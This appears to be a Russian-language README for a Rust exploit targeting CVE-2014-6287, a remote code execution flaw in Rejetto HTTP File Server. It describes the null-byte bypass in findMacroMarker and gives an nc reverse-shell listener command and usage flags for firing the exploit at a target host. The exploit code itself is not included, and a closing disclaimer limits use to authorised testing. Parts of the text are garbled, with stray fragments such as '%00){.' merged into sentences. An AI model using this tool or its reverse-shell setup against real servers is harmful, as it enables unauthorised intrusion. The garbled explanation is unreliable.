
Реализация эксплойта CVE-2014-6287 на Rust, нацеленная на Rejetto HTTP File Server (HFS) версий 2.3x до 2.3c.
Реализация на Rust эксплойта CVE-2014-6287, нацеленного на Rejetto HTTP File Server (HFS) версий 2.3x до 2.3c.
CVE-2014-6287 — это критическая уязвимость удаленного выполнения кода в Rejetto HTTP File Server (HFS).
Функция findMacroMarker в в Rejetto HTTP File Server позволяет удаленным злоумышленникам выполнять произвольные программы через последовательность в поисковом запросе. Эта уязвимость позволяет злоумышленникам обходить проверку ввода и внедрять вредоносный код, который выполняется на целевой системе.
parserLib.pas%00Эксплойт работает следующим образом:
%00){. и .}Перед выполнением эксплойта настройте слушатель на вашей атакующей машине для приема обратной оболочки:
# Замените <LPORT> на желаемый порт прослушивания
nc -lvnp <LPORT>
cargo run -- -l <LHOST> -p <LPORT> -r <RHOST> [-t <RPORT>]
-l, --lhost <LHOST>: Ваш локальный IP-адрес (атакующая машина)-p, --lport <LPORT>: Ваш локальный порт для обратной оболочки-r, --rhost <RHOST>: Целевой IP-адрес (уязвимый сервер HFS)-t, --rport <RPORT>: Целевой порт (по умолчанию: 80)Этот инструмент предназначен только для образовательных целей и санкционированного тестирования на проникновение. Используйте ответственно и только на системах, которыми вы владеете или на которые имеете явное разрешение